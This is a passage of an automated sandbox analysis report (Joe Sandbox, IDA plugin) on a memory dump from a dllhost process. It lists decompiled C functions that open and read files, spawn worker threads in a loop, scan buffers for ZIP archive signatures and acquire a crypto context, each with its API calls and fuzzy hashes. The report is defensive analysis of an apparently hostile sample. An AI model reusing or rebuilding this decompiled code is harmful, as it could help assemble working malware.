					 *((char*)(_t28 + 0x10)) = 1;
					 *(_t28 + 1) = _t20;
					 *(_t28 + 4) = _t15;
					 *((char*)(_t28 + 8)) = 0;
					 *(_t28 + 0xc) = 0;
					__eflags = _t20;
					if(_t20 != 0) {
						_t17 = SetFilePointer(_t15, 0, 0, 1); // executed
						 *(_t28 + 0xc) = _t17;
					}
					 *_t24 = 0;
					return _t28;
				} else {
					 *_t24 = 0x200;
					return 0;
				}
			}














                                                0x0286e0d3
                                                0x0286e0d5
                                                0x0286e0eb
                                                0x0286e0f1
                                                0x0286e0f7
                                                0x0286e0fd
                                                0x0286e10c
                                                0x0286e10d
                                                0x0286e115
                                                0x0286e11b
                                                0x0286e120
                                                0x0286e128
                                                0x0286e12d
                                                0x0286e130
                                                0x0286e133
                                                0x0286e137
                                                0x0286e13a
                                                0x0286e13d
                                                0x0286e141
                                                0x0286e148
                                                0x0286e14a
                                                0x0286e153
                                                0x0286e159
                                                0x0286e159
                                                0x0286e15e
                                                0x0286e16a
                                                0x0286e0ff
                                                0x0286e0ff
                                                0x0286e10b
                                                0x0286e10b

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,?,?,0286F440,00000141,FFFFFFFF,?,0286FFE1,?), ref: 0286E0F1
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000001,?,0286F440,00000141,FFFFFFFF,?,0286FFE1,?,?,00000244,E7FE870C), ref: 0286E115
                                                • new.LIBCMT ref: 0286E123
                                                • SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000001), ref: 0286E153
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$Pointer$Create
                                                • String ID:
                                                • API String ID: 250661774-0
                                                • Opcode ID: 625fa08a217afb5e9e9010887624c0259fb61ff5aad43fd38f3f9457f7a5bad5
                                                • Instruction ID: 1400f2bc7f65b56f44759a83f2863888007258bcaf617fed23bb853665a855f7
                                                • Opcode Fuzzy Hash: 625fa08a217afb5e9e9010887624c0259fb61ff5aad43fd38f3f9457f7a5bad5
                                                • Instruction Fuzzy Hash: 3D11C879684301BBF7308F68DC0AF56FBD89B01724F204649F658EB6C0D3F5A5508754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286B470 Relevance: 6.0, APIs: 4, Instructions: 32sleepthreadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0286B470() {
				void* _v8;

				 *0x2896a48 = 0;
				L1:
				if( *0x2896a48 < 0x40) {
					_v8 = 0;
					if(E0286B660( &_v8) != 1) {
						CreateThread(0, 0, E0286B3C0, _v8, 0, 0); // executed
						Sleep(0xa); // executed
					} else {
						Sleep(0x1e); // executed
					}
				} else {
					Sleep(0x12c);
				}
				goto L1;
			}




                                                0x0286b482
                                                0x0286b490
                                                0x0286b497
                                                0x0286b4a5
                                                0x0286b4b4
                                                0x0286b4cc
                                                0x0286b4d0
                                                0x0286b4b6
                                                0x0286b4b8
                                                0x0286b4b8
                                                0x0286b499
                                                0x0286b49e
                                                0x0286b49e
                                                0x00000000

                                                APIs
                                                • Sleep.KERNEL32(0000012C), ref: 0286B49E
                                                • Sleep.KERNELBASE(0000001E), ref: 0286B4B8
                                                • CreateThread.KERNELBASE(00000000,00000000,0286B3C0,00000000,00000000,00000000), ref: 0286B4CC
                                                • Sleep.KERNELBASE(0000000A), ref: 0286B4D0
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Sleep$CreateThread
                                                • String ID:
                                                • API String ID: 3220764680-0
                                                • Opcode ID: 2540b92d72069ceb8cead1db3b0b2eb5da768c903aaa674d38928f943c1c99e6
                                                • Instruction ID: 7070fcec198977504bc9fff617e336e727162ca06c9b6c28ba95a155c1933938
                                                • Opcode Fuzzy Hash: 2540b92d72069ceb8cead1db3b0b2eb5da768c903aaa674d38928f943c1c99e6
                                                • Instruction Fuzzy Hash: 97F0A73C9C031CFBE610AB94DC09F6DBBA8AF1571CF558414E205F66C097F46950DBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286E170 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0286E170(char* __ecx, long __edx, LONG* _a4) {
				LONG* _t13;
				LONG* _t19;

				if( *__ecx == 0) {
					_t13 = _a4;
					if(_t13 != 0) {
						if(_t13 != 1) {
							if(_t13 == 2) {
								 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x18)) + __edx;
							}
							return 0;
						} else {
							 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + __edx;
							return 0;
						}
					} else {
						 *((intOrPtr*)(__ecx + 0x1c)) = __edx;
						return _t13;
					}
				} else {
					if( *((char*)(__ecx + 1)) == 0) {
						return 0x1d;
					} else {
						_t19 = _a4;
						if(_t19 != 0) {
							if(_t19 != 1) {
								if(_t19 != 2) {
									return 0x13;
								} else {
									SetFilePointer( *(__ecx + 4), __edx, 0, _t19); // executed
									return 0;
								}
							} else {
								SetFilePointer( *(__ecx + 4), __edx, 0, _t19);
								return 0;
							}
						} else {
							SetFilePointer( *(__ecx + 4),  *((intOrPtr*)(__ecx + 0xc)) + __edx, _t19, _t19); // executed
							return 0;
						}
					}
				}
			}





                                                0x0286e176
                                                0x0286e1d4
                                                0x0286e1d9
                                                0x0286e1e3
                                                0x0286e1ef
                                                0x0286e1f6
                                                0x0286e1f6
                                                0x0286e1fc
                                                0x0286e1e5
                                                0x0286e1e5
                                                0x0286e1eb
                                                0x0286e1eb
                                                0x0286e1db
                                                0x0286e1db
                                                0x0286e1df
                                                0x0286e1df
                                                0x0286e178
                                                0x0286e17c
                                                0x0286e1d3
                                                0x0286e17e
                                                0x0286e17e
                                                0x0286e183
                                                0x0286e19d
                                                0x0286e1b3
                                                0x0286e1cc
                                                0x0286e1b5
                                                0x0286e1bc
                                                0x0286e1c5
                                                0x0286e1c5
                                                0x0286e19f
                                                0x0286e1a6
                                                0x0286e1af
                                                0x0286e1af
                                                0x0286e185
                                                0x0286e190
                                                0x0286e199
                                                0x0286e199
                                                0x0286e183
                                                0x0286e17c

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E190
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E1A6
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e6232d9cd9527174c80827e4fb23c86dd252e640eedd86a8b60bf1fe7f4fd92a
                                                • Instruction ID: 753125bfe4c0b71a5b889be9b9ad27ea812198eeba3bec924de0dd910a3176f1
                                                • Opcode Fuzzy Hash: e6232d9cd9527174c80827e4fb23c86dd252e640eedd86a8b60bf1fe7f4fd92a
                                                • Instruction Fuzzy Hash: 0111217D6441046FEB28CF69EC45F363BDDEB85729F2888A9F40CC9551E323C852AB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286E3C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0286E3C0(char* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t46;
				signed int _t48;
				intOrPtr _t49;
				long _t54;
				struct _OVERLAPPED* _t55;
				signed int _t58;
				void* _t60;
				intOrPtr _t61;
				int _t63;
				long _t65;
				intOrPtr* _t67;
				intOrPtr _t69;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t84;
				long _t87;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;

				_t68 = __ecx;
				_t67 = __ecx; // executed
				_t46 = E0286E170(__ecx, 0, 2); // executed
				_t95 = _t94 + 4;
				if(_t46 == 0) {
					if( *__ecx == 0) {
						_t84 =  *((intOrPtr*)(__ecx + 0x1c));
						goto L7;
					} else {
						if( *((char*)(__ecx + 1)) == 0) {
							_t84 = 0;
							_v16 = 0;
							goto L8;
						} else {
							_t65 = SetFilePointer( *(__ecx + 4), 0, 0, 1); // executed
							_t84 = _t65 -  *((intOrPtr*)(_t67 + 0xc));
							L7:
							_v16 = _t84;
							_v12 = 0xffff;
							if(_t84 < 0xffff) {
								L8:
								_v12 = _t84;
							}
						}
					}
					_push(0x404);
					_t48 = E02875A3B(_t68);
					_t91 = _t48;
					_t96 = _t95 + 4;
					if(_t91 != 0) {
						_t69 = _v12;
						_t49 = 4;
						_v8 = 0xffffffff;
						if(_t69 > 4) {
							while(1) {
								_t78 =  >  ? _t69 : _t49 + 0x400;
								_t54 = _t84 - _t78;
								_v32 = _t78;
								_v28 = _t54;
								_t87 =  >  ? 0x404 : _t84 - _t54;
								_t55 = E0286E170(_t67, _t54, 0); // executed
								_t96 = _t96 + 4;
								if(_t55 != 0) {
									goto L31;
								}
								_t72 = _t87;
								_v20 = _t87;
								if( *_t67 == _t55) {
									_t80 =  *((intOrPtr*)(_t67 + 0x1c));
									if(_t80 + _t87 >  *((intOrPtr*)(_t67 + 0x18))) {
										_t72 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
										_v20 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
									}
									E02883DB0(_t91,  *((intOrPtr*)(_t67 + 0x14)) + _t80, _t72);
									_t58 = _v20;
									_t96 = _t96 + 0xc;
									 *((intOrPtr*)(_t67 + 0x1c)) =  *((intOrPtr*)(_t67 + 0x1c)) + _t58;
								} else {
									_t63 = ReadFile( *(_t67 + 4), _t91, _t87,  &_v24, _t55); // executed
									if(_t63 == 0) {
										 *((char*)(_t67 + 8)) = 1;
									}
									_t58 = _v24;
								}
								if(_t58 / _t87 == 1) {
									_t60 = _t87 - 3;
									if(_t60 < 0) {
										L28:
										_t61 = _v8;
									} else {
										while(1) {
											_t60 = _t60 - 1;
											if( *((char*)(_t60 + _t91)) == 0x50 &&  *((char*)(_t60 + _t91 + 1)) == 0x4b &&  *((char*)(_t60 + _t91 + 2)) == 5 &&  *((char*)(_t60 + _t91 + 3)) == 6) {
												break;
											}
											if(_t60 >= 0) {
												continue;
											} else {
												goto L28;
											}
											goto L29;
										}
										_t61 = _t60 + _v28;
										_v8 = _t61;
									}
									L29:
									if(_t61 == 0) {
										_t69 = _v12;
										_t49 = _v32;
										_t84 = _v16;
										if(_t49 < _t69) {
											continue;
										}
									}
								}
								goto L31;
							}
						}
						L31:
						L02875A36(_t91);
						return _v8;
					} else {
						return _t48 | 0xffffffff;
					}
				} else {
					return _t46 | 0xffffffff;
				}
			}






























                                                0x0286e3c0
                                                0x0286e3cb
                                                0x0286e3cd
                                                0x0286e3d2
                                                0x0286e3d7
                                                0x0286e3e5
                                                0x0286e40a
                                                0x00000000
                                                0x0286e3e7
                                                0x0286e3eb
                                                0x0286e403
                                                0x0286e405
                                                0x00000000
                                                0x0286e3ed
                                                0x0286e3f6
                                                0x0286e3fe
                                                0x0286e40d
                                                0x0286e412
                                                0x0286e415
                                                0x0286e41a
                                                0x0286e41c
                                                0x0286e41c
                                                0x0286e41c
                                                0x0286e41a
                                                0x0286e3eb
                                                0x0286e420
                                                0x0286e425
                                                0x0286e42a
                                                0x0286e42c
                                                0x0286e431
                                                0x0286e43d
                                                0x0286e440
                                                0x0286e445
                                                0x0286e44e
                                                0x0286e454
                                                0x0286e45f
                                                0x0286e467
                                                0x0286e469
                                                0x0286e46e
                                                0x0286e47b
                                                0x0286e480
                                                0x0286e485
                                                0x0286e48a
                                                0x00000000
                                                0x00000000
                                                0x0286e490
                                                0x0286e492
                                                0x0286e497
                                                0x0286e4b6
                                                0x0286e4bf
                                                0x0286e4c4
                                                0x0286e4c6
                                                0x0286e4c6
                                                0x0286e4d1
                                                0x0286e4d6
                                                0x0286e4d9
                                                0x0286e4dc
                                                0x0286e499
                                                0x0286e4a3
                                                0x0286e4ab
                                                0x0286e4ad
                                                0x0286e4ad
                                                0x0286e4b1
                                                0x0286e4b1
                                                0x0286e4e6
                                                0x0286e4e8
                                                0x0286e4ed
                                                0x0286e510
                                                0x0286e510
                                                0x0286e4f0
                                                0x0286e4f0
                                                0x0286e4f0
                                                0x0286e4f5
                                                0x00000000
                                                0x00000000
                                                0x0286e50e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286e50e
                                                0x0286e53b
                                                0x0286e53e
                                                0x0286e53e
                                                0x0286e513
                                                0x0286e515
                                                0x0286e517
                                                0x0286e51a
                                                0x0286e51d
                                                0x0286e522
                                                0x00000000
                                                0x00000000
                                                0x0286e522
                                                0x0286e515
                                                0x00000000
                                                0x0286e4e6
                                                0x0286e454
                                                0x0286e528
                                                0x0286e529
                                                0x0286e53a
                                                0x0286e433
                                                0x0286e43c
                                                0x0286e43c
                                                0x0286e3d9
                                                0x0286e3e0
                                                0x0286e3e0

                                                APIs
                                                  • Part of subcall function 0286E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E190
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E3F6
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: f23afccbe5b28d011fb419a756b7592f1be681996c8bb5400775578fdd9b85c8
                                                • Instruction ID: f3e616bcdee3a40fb248cc607780ffb7ae748bb8bf5d06a5990299beba49ae63
                                                • Opcode Fuzzy Hash: f23afccbe5b28d011fb419a756b7592f1be681996c8bb5400775578fdd9b85c8
                                                • Instruction Fuzzy Hash: 0241D2BCE002059BEF24CE79D889B7EBBA6AB84314F1481B9D909DB281E730D9518B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286FF70 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E0286FF70(void* __eflags) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t16;
				intOrPtr* _t17;
				void* _t20;
				intOrPtr* _t28;
				signed int _t35;

				_push(0xffffffff);
				_push(E028847B2);
				_push( *[fs:0x0]);
				_push(_t20);
				_t12 =  *0x288f008; // 0xe7fe870c
				_push(_t12 ^ _t35);
				 *[fs:0x0] =  &_v16;
				_t32 = _t20;
				_t28 = E02870A6E(_t20, __eflags, 0x244);
				_v20 = _t28;
				_push(_t20);
				_t21 = _t28;
				 *_t28 = 0;
				 *((intOrPtr*)(_t28 + 4)) = 0xffffffff;
				 *((intOrPtr*)(_t28 + 0x134)) = 0xffffffff;
				 *((intOrPtr*)(_t28 + 0x138)) = 0;
				 *((intOrPtr*)(_t28 + 0x13c)) = 0;
				_v8 = 0xffffffff;
				_t16 = E0286F3D0(_t28, _t28, _t32); // executed
				 *0x2896a4c = _t16;
				if(_t16 == 0) {
					_t17 = E02870A6E(_t32, __eflags, 8);
					 *_t17 = 1;
					 *((intOrPtr*)(_t17 + 4)) = _t28;
					 *[fs:0x0] = _v16;
					return _t17;
				} else {
					E02870030(_t28, _t21);
					 *[fs:0x0] = _v16;
					return 0;
				}
			}















                                                0x0286ff73
                                                0x0286ff75
                                                0x0286ff80
                                                0x0286ff81
                                                0x0286ff84
                                                0x0286ff8b
                                                0x0286ff8f
                                                0x0286ff95
                                                0x0286ffa1
                                                0x0286ffa3
                                                0x0286ffa6
                                                0x0286ffa8
                                                0x0286ffaa
                                                0x0286ffb0
                                                0x0286ffb7
                                                0x0286ffc1
                                                0x0286ffcb
                                                0x0286ffd5
                                                0x0286ffdc
                                                0x0286ffe1
                                                0x0286ffe8
                                                0x02870007
                                                0x0287000f
                                                0x02870015
                                                0x0287001b
                                                0x02870028
                                                0x0286ffea
                                                0x0286ffed
                                                0x0286fff7
                                                0x02870004
                                                0x02870004

                                                APIs
                                                • new.LIBCMT ref: 0286FF9C
                                                  • Part of subcall function 0286F3D0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0286FFE1,?,?,00000244,E7FE870C,?,?,?,E7FE870C,028847B2), ref: 0286F3F7
                                                • new.LIBCMT ref: 02870007
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 45f91a2eb7c8c01c6d45e70b23e527cf63bd18dc0b4989a6a6cf8a4e90da5780
                                                • Instruction ID: 5c54d601d5eef6eef8204c074343bcd3f80e124a3dc54dcd260da28e7c735af1
                                                • Opcode Fuzzy Hash: 45f91a2eb7c8c01c6d45e70b23e527cf63bd18dc0b4989a6a6cf8a4e90da5780
                                                • Instruction Fuzzy Hash: 8B11C1BAA04605AFD314DF1DD805BAAF7E9FB41730F00432AE429C77C0EBB5A4108B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02877848 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02877848(void* _a4) {
				char _t3;
				intOrPtr* _t4;
				intOrPtr _t6;

				if(_a4 != 0) {
					_t3 = RtlFreeHeap( *0x28967f4, 0, _a4); // executed
					if(_t3 == 0) {
						_t4 = E02875D43();
						_t6 = E02875CCA(GetLastError());
						 *_t4 = _t6;
						return _t6;
					}
				}
				return _t3;
			}






                                                0x02877851
                                                0x0287785e
                                                0x02877866
                                                0x02877869
                                                0x02877877
                                                0x0287787d
                                                0x00000000
                                                0x0287787f
                                                0x02877866
                                                0x02877881

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,0287C333,?,00000000,?,00000000,?,0287C35A,?,00000007,?,?,0287C757,?), ref: 0287785E
                                                • GetLastError.KERNEL32(?,?,0287C333,?,00000000,?,00000000,?,0287C35A,?,00000007,?,?,0287C757,?,?), ref: 02877870
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: b18b924e1c7c696594c229003c087083d0823a5c37c091be9ea5fd9039a48d0f
                                                • Instruction ID: da1ced1c5671e03e14698b1c6a292c1705dbd6fec1c74d3d5d17624c140a2595
                                                • Opcode Fuzzy Hash: b18b924e1c7c696594c229003c087083d0823a5c37c091be9ea5fd9039a48d0f
                                                • Instruction Fuzzy Hash: 76E0CD3D440204A7DB142FA8EC0CB597BD9DF40354F540434F94CD9190DB78D490CBC8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028648B0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E028648B0(intOrPtr* __ecx) {
				void* _t8;
				void* _t11;
				void* _t18;
				intOrPtr* _t19;

				_t19 = __ecx;
				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50);
				_t20 =  *_t19;
				_t18 = _t8;
				asm("movups xmm0, [esi]");
				_t2 = _t18 + 0x50; // 0x50
				asm("movups [edi], xmm0");
				asm("movups xmm0, [esi+0x10]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm0, [esi+0x20]");
				asm("movups [edi+0x20], xmm0");
				asm("movups xmm0, [esi+0x30]");
				asm("movups [edi+0x30], xmm0");
				asm("movups xmm0, [esi+0x40]");
				asm("movups [edi+0x40], xmm0");
				E02883DB0(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
				_t11 = E02864920(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
				LocalFree(_t18); // executed
				return _t11;
			}







                                                0x028648b2
                                                0x028648ba
                                                0x028648c0
                                                0x028648c6
                                                0x028648c8
                                                0x028648ca
                                                0x028648cd
                                                0x028648d0
                                                0x028648d3
                                                0x028648d7
                                                0x028648db
                                                0x028648df
                                                0x028648e3
                                                0x028648e7
                                                0x028648eb
                                                0x028648ef
                                                0x028648fa
                                                0x02864907
                                                0x02864912
                                                0x0286491d

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,?,00000000,-00000050,02864BCD), ref: 028648C0
                                                  • Part of subcall function 02864920: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02864935
                                                • LocalFree.KERNELBASE(00000000), ref: 02864912
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: a75c4a5767216db177071c57487dc9ea0a519df9f6683bacdecf472a73b8f1c8
                                                • Instruction ID: c822feed435d475f7ef18ed81ff82d2ad25c99b3d3136c57ad99173396d960b5
                                                • Opcode Fuzzy Hash: a75c4a5767216db177071c57487dc9ea0a519df9f6683bacdecf472a73b8f1c8
                                                • Instruction Fuzzy Hash: 29018035D00B45ABD3118F38C9419B2F3B4FF6D318705AB09EAC562912E761B5E48750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286E280 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0286E280(char* __ecx, long __edx) {
				void _v5;
				long _v12;
				signed int _t22;
				signed int* _t28;
				intOrPtr _t29;
				intOrPtr _t31;
				char* _t35;

				_t35 = __ecx;
				_t28 = __edx;
				_v12 = __edx;
				_t33 = 1;
				if( *__ecx == 0) {
					_t29 =  *((intOrPtr*)(__ecx + 0x1c));
					_t31 =  *((intOrPtr*)(__ecx + 0x18));
					if(_t29 + 1 > _t31) {
						_t33 = _t31 - _t29;
					}
					E02883DB0( &_v5,  *((intOrPtr*)(_t35 + 0x14)) + _t29, _t33);
					_t22 = _t29 + _t33;
					_t28 = _v12;
					 *(_t35 + 0x1c) = _t22;
				} else {
					_t22 = ReadFile( *(__ecx + 4),  &_v5, 1,  &_v12, 0); // executed
					if(_t22 == 0) {
						 *((char*)(_t35 + 8)) = 1;
					}
					_t33 = _v12;
				}
				if(_t33 != 1) {
					if( *_t35 == 0 ||  *((char*)(_t35 + 8)) == 0) {
						goto L9;
					} else {
						return _t22 | 0xffffffff;
					}
				} else {
					 *_t28 = _v5 & 0x000000ff;
					L9:
					return 0;
				}
			}










                                                0x0286e288
                                                0x0286e28a
                                                0x0286e28d
                                                0x0286e290
                                                0x0286e298
                                                0x0286e2bb
                                                0x0286e2be
                                                0x0286e2c6
                                                0x0286e2ca
                                                0x0286e2ca
                                                0x0286e2d7
                                                0x0286e2dc
                                                0x0286e2e2
                                                0x0286e2e5
                                                0x0286e29a
                                                0x0286e2a8
                                                0x0286e2b0
                                                0x0286e2b2
                                                0x0286e2b2
                                                0x0286e2b6
                                                0x0286e2b6
                                                0x0286e2eb
                                                0x0286e2ff
                                                0x00000000
                                                0x0286e309
                                                0x0286e310
                                                0x0286e310
                                                0x0286e2ed
                                                0x0286e2f1
                                                0x0286e2f5
                                                0x0286e2fb
                                                0x0286e2fb

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0286E59A,00000001), ref: 0286E2A8
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: dad481767f9a12f946a632b51bb81e63fbfb27eb821585f3f5cbb16e205f1fd4
                                                • Instruction ID: 12ab616add598aa6b09a87e3a5f0ad3c29137f9cde3df8993497c8256128497f
                                                • Opcode Fuzzy Hash: dad481767f9a12f946a632b51bb81e63fbfb27eb821585f3f5cbb16e205f1fd4
                                                • Instruction Fuzzy Hash: AC11B97DA042086FD720CE99D884FA9B7FDAB45314F0405AAE849C7341E771A948C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286F3D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E0286F3D0(intOrPtr* __ecx, void* __edi, CHAR* _a4) {
				char _v8;
				char _t13;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				short _t21;
				CHAR* _t23;
				char* _t29;
				CHAR* _t32;
				short* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t36 = __ecx;
				if( *__ecx != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					return 0x1000000;
				} else {
					_t2 = _t36 + 0x140; // 0x140
					_t32 = _t2;
					GetCurrentDirectoryA(0x104, _t32);
					_t23 = _t32;
					_t3 =  &(_t23[1]); // 0x141
					_t29 = _t3;
					do {
						_t13 =  *_t23;
						_t23 =  &(_t23[1]);
					} while (_t13 != 0);
					_t24 = _t23 - _t29;
					_t14 =  *((intOrPtr*)(_t23 - _t29 + _t36 + 0x13f));
					if(_t14 != 0x5c && _t14 != 0x2f) {
						_t34 = _t32 - 1;
						do {
							_t20 =  *((intOrPtr*)(_t34 + 1));
							_t34 = _t34 + 1;
						} while (_t20 != 0);
						_t21 = "\\"; // 0x5c
						 *_t34 = _t21;
					}
					_t16 = E0286E0D0(_a4, _t24,  &_v8); // executed
					if(_t16 != 0) {
						_t17 = E0286E550(_t16); // executed
						 *_t36 = _t17;
						_t28 =  ==  ? 0x200 : 0;
						_t18 =  ==  ? 0x200 : 0;
						return  ==  ? 0x200 : 0;
					} else {
						return _v8;
					}
				}
			}















                                                0x0286f3d3
                                                0x0286f3d5
                                                0x0286f3da
                                                0x0286f479
                                                0x0286f3ea
                                                0x0286f3eb
                                                0x0286f3eb
                                                0x0286f3f7
                                                0x0286f3fd
                                                0x0286f3ff
                                                0x0286f3ff
                                                0x0286f402
                                                0x0286f402
                                                0x0286f404
                                                0x0286f405
                                                0x0286f409
                                                0x0286f40b
                                                0x0286f414
                                                0x0286f41a
                                                0x0286f420
                                                0x0286f420
                                                0x0286f423
                                                0x0286f426
                                                0x0286f42a
                                                0x0286f430
                                                0x0286f430
                                                0x0286f43b
                                                0x0286f446
                                                0x0286f454
                                                0x0286f45b
                                                0x0286f465
                                                0x0286f468
                                                0x0286f46d
                                                0x0286f448
                                                0x0286f44f
                                                0x0286f44f
                                                0x0286f446

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0286FFE1,?,?,00000244,E7FE870C,?,?,?,E7FE870C,028847B2), ref: 0286F3F7
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 94d98a3f7aaae801e6fadc44107af39bc699365e51a3e23c40b5c01fdddf8a6b
                                                • Instruction ID: 96354e709fbfb5996ff1aaffcecc5de3269e9e787b22f4fb9fa4b3a3a3ac7cd0
                                                • Opcode Fuzzy Hash: 94d98a3f7aaae801e6fadc44107af39bc699365e51a3e23c40b5c01fdddf8a6b
                                                • Instruction Fuzzy Hash: 97112B3E5042059ACB248F2CB808BF5B795FF99314F00826EE99DC7E40E732A9538790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

